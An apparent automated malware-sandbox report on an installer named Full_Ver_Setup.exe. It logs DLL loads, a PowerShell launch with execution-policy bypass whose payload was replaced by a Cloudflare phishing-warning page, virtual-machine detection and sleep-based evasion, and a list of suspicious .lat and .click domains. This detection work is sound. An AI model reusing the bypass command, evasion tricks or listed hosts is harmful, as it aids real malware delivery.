Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Full_Ver_Setup.exe Static file information: File size 74953137 > 1048576

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> < Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323AD96 push eax; mov dword ptr [esp], D1D2D3D4h 0_2_0323ADA4
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323DC36 push eax; mov dword ptr [esp], 060504D3h 0_2_0323DC3B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CF2E8B push FFFFFF8Bh; retf 4_2_07CF2E94
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2356 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1274 Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe TID: 736 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe TID: 2692 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5688 Thread sleep count: 2356 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668 Thread sleep count: 1274 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1892 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 564 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809 Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809 Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW6t
Source: Full_Ver_Setup.exe, 00000000.00000003.2012907807.0000000003F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: e4qemuI
Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_032003C9 mov edx, dword ptr fs:[00000030h] 0_2_032003C9
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03200989 mov eax, dword ptr fs:[00000030h] 0_2_03200989
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03200FD8 mov eax, dword ptr fs:[00000030h] 0_2_03200FD8
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03200FD9 mov eax, dword ptr fs:[00000030h] 0_2_03200FD9
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03200D39 mov eax, dword ptr fs:[00000030h] 0_2_03200D39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Full_Ver_Setup.exe String found in binary or memory: rapeflowwj.lat
Source: Full_Ver_Setup.exe String found in binary or memory: crosshuaht.lat
Source: Full_Ver_Setup.exe String found in binary or memory: fannleadyn.click
Source: Full_Ver_Setup.exe String found in binary or memory: discokeyus.lat
Source: Full_Ver_Setup.exe String found in binary or memory: grannyejh.lat
Source: Full_Ver_Setup.exe String found in binary or memory: energyaffai.lat
Source: Full_Ver_Setup.exe String found in binary or memory: necklacebudi.lat
Source: Full_Ver_Setup.exe String found in binary or memory: sustainskelet.lat
Source: Full_Ver_Setup.exe String found in binary or memory: aspecteirs.lat
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 